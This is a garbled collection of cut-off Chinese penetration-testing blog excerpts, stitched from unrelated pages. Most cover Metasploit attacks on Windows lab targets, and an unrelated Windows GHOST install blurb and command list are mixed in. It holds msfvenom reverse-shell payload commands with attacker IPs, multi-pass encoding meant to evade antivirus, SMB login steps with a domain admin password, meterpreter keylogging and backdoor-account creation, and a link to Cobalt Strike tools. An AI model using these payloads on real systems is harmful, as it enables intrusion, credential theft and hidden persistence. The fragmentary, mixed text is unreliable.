好久没有玩kali了,刚才看到一位大佬msf渗透win10的思路,我感觉不错,我就来复现一下 kali :192.168.45.136 win10 : 192.168.45.137 1  首先,我们查看一下kali的ip 2  生成 远控马儿  最后跟着生成马儿的路径 msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.45.136  LPROT=4444 EXITFUNC=thread -b '

其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利用公网的MSF直接攻击其他服务器内网的案例. 一.准备工作 1.安装了Msf的公网主机+Ubuntu系统 2.一台其他服务器内网存在445漏洞 3.细心,细心,细心,钻研,钻研!!! 二.反弹一个shell 第一步:公网主机操作 生成msf木马: msfvenom -p windows/meterpret

Exp4 恶意代码分析 实验内容 实验点一:系统运行监控 (1)使用如计划任务,每隔一分钟记录自己的电脑有哪些程序在联网,连接的外部IP是哪里.运行一段时间并分析该文件,综述一下分析结果.目标就是找出所有连网的程序,连了哪里,大约干了什么(不抓包的情况下只能猜),你觉得它这么干合适不.如果想进一步分析的,可以有针对性的抓包. (2)安装配置sysinternals里的sysmon工具,设置合理的配置文件,监控自己主机的重点事可疑行为. 1.使用schtasks指令监控系统 通过schtasks

靶机链接 https://www.vulnhub.com/entry/the-ether-evilscience,212 运行环境 本靶机提供了VMware的镜像,从Vulnhub下载之后解压,运行vmx文件即可 靶机:本靶机默认使用了自动获取的上网模式.运行靶机之后,将会桥接到物理网卡,接入网络. 攻击机:Kali虚拟机运行于virtualbox,同样使用桥接模式,即可访问靶机. 靶机说明 本靶机有一定难度,不适合初学者. 本靶机的渗透目标为渗透进靶机并且找到系统中隐藏的Flag值. 官方提供

Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行.每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag.网址:https://www.vulnhub.com 吧下面代码复制另存为后缀为.html文件打开就可以正常访问了 <!doctype html> <html> <head&

SMB relay 0x00 SMB服务 先来了解一下什么是 SMB 服务,SMB(Server Message Block)是一个协议名称,用它可以共享计算机之间的文件.打印机.串口等,通过 SMB 也可以远程访问服务器端的文件.打印机等共享资源. SMB协议可以为局域网用户提供相关的功能和机制,来保证传输的可靠性.局域网中90%的数据包以及95%的字节是通过SMB协议进行传输,这是为了解决网络的稳定性和数据流在共享带宽时的公平性.拥塞控制及效率等问题.----来源百度百科 总之 SMB 服务

Vulhub-DC-3靶场 前言 今天把DC-3的靶场打了一遍,可以说这个靶场用到的思路是非常经典的,从信息搜集到漏洞利用包括内核提权.最最重要的是为了下载它的提权EXP,我它喵还花了一块二买了个CSDN站的代下载.DC-3靶场只有一个Flag,通过本篇博客,我们可以学到如下几点: 1.内网主机信息探测 2.JoomScan漏洞探测 3.MSF制作PHP马 4.python回显shell 5.Linux内核提权 正文 信息搜集 首先来一波传统艺能arp-scan,得到信息如下,发现存活主机10.

环境 漏洞详情 (qiyuanxuetang.net) 仅主机模式内网网段192.168.183.0/24 外网网段192.168.157.0/24 其中Ubuntu作为对外的内网机器 攻击机kali地址:192.168.157.129  悬剑:192.168.157.130 还需要进入ubuntu开启服务,密码ubuntu cd /home/ubuntu/Desktop/vulhub/struts2/s2-045vsudo docker-compose up -d cd /home/ubunt

信息收集 信息收集 域控制器的相关信息: 通过arp扫描发现域控制器的ip地址为:192.168.52.138,尝试使用msf的smb_login模块登录smb是否成功 1 search smb_login 2 use 0 3 set rhosts 192.168.52.138 4 set smbpass hongrisec@2022 5 set smbuser Administrator 6 set smbdomain GOD 7 run 用户名.密码.domain我在前面一篇文章中已经获取到

Msf生成木马:(多层加密都不能免杀) msfvenom -p windows/shell_reverse_tcp lhost=192.168.33.143 lport=7001 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -

1>生成木马 (123.exe)        -f 输出格式 -o 输出地址 2>启动msfconsole 3>进行设置&&启动攻击 4>木马运行&后门操作 <运行后,建立了一条会话 <查看系统信息 <截取时下桌面 <捕获击键记录      wo_shi_yi_ge_hao_ren_ <控制键盘鼠标   启用与否 格式: 禁用键盘: <执行shell 命令 <建立后门用户  添加管理员权限 至此已实现了账户的简单隐

目录 简单信息收集 主机发现 ping nmap 端口扫描 nmap OS及服务版本探测 nmap -sV 绕过防火墙尝试 诱饵 随机数据长度 随机顺序扫描目标 MAC地址欺骗 实现win10的渗透攻击 CVE-2017-0199(失败) 漏洞原理 实现过程 EasyFileSharing模块(失败) 攻击过程 msf web_delivery模块攻击(成功) 攻击原理 攻击过程 CVE-2019-9766(成功) 漏洞原理 攻击过程 进行提权 普通提权 利用系统漏洞 ms16_032 powe

1Windows激活:测试环境搭建 随着Windows 10的发布,许多用户都用上了这个新一代的操作系统.Windows 10有个最好的设置就是,只要你在已经激活的旧系统中升进行升级操作,就能获得一个已经激活的Windows 10系统,这是微软给用户的福利.这里边的关键字就是"激活",网上出现大量号称"Win7/8/10破解补丁.激活软件"的盗版工具.它们均宣称能免费激活Windows系列,于是便颇受欢迎. 不少用户就是用这些工具来激活了盗版的Windows,看着系

在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门. msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i -b -f exe > abc.exe 然后在到MSF根据刚才配置的木马后门进行监听... 然后在把木马上传到服务器(受害者)的机器里,必须上传到可读可写的目录下哦,

一.系统主要特点 1.安装维护方便快速 - 全自动无人值守安装,采用万能GHOST技术,安装系统过程只需3-5分钟,适 合新旧各种机型. - 集成常见硬件驱动,智能识别+预解压技术,绝大多数硬件可以快速自动安装 相应的驱动. - 多种安装模式,支持光盘启动安装.PE下安装.WINDOWS下安装. - 自带WinPE微型操作系统和常用分区工具.DOS工具,装机备份维护轻松无忧. - 集成了电脑笔记本&台式机大量驱动(配备万能驱动助理),也可以适应其它电脑系统安装. 2.运行稳定,兼容性好 - 源安

首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^)Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用.下面是具体的利用方法.我们可以通过指令查看msf里的paylo

Windows 10/Win10命令大全通用(Win8,Win7 Windows 10/Win10命令大全通用(Win8,Win7) 1.calc:启动计算器       2.appwiz.cpl:程序和功能 3.certmgr.msc:证书管理实用程序 4.charmap:启动字符映射表 5.chkdsk.exe:Chkdsk磁盘检查(管理员身份运行命令提示符) 6.cleanmgr: 打开磁盘清理工具 7.cliconfg:SQL SERVER 客户端网络实用工具 8.cmstp:连接管理器

目录 -- MSF基础应用 实验说明 实验任务内容 基础问题回答 实验内容 主动攻击 ms17_10_eternalblue(成功) ms17_10_psexec(成功) ms08_067_netapi(成功) ms15_020_shortcut_icon_dllloader(失败) 浏览器攻击 ms10_002_aurora(成功) ms10_018_ie_behaviors(成功) ms11_003_ie_css_import(成功且唯一) ms14_064_ole_code_executi

一.知识点总结 二.攻击实例 主动攻击的实践 ms08_067(win7) payload/generic/shell_reverse_tcp(失败) payload/windows/meterpreter/reverse_tcp(失败) ms17_010_eternalblue(win7) payload/windows/x64/meterpreter/reverse_tcp(成功) 攻击浏览器的实践 ms11_050(win7)(成功) ms14_064(win7)   exploit/wi

链接:https://pan.baidu.com/s/1qstCSM9nO95tFGBsnYFYZw 提取码:w6ih  上面是工具 需要java jdk 在1.8.5 以上  实验环境windows 在K8_CS_3.12\cobaltstrike  目录下允许cmd  在cmd 执行 TeamServer.exe 192.168.11.247 你的密码 回车 点击CobaltStrike.exe(win) 添加监听列表 步骤 cobalt strike-->listeners-->add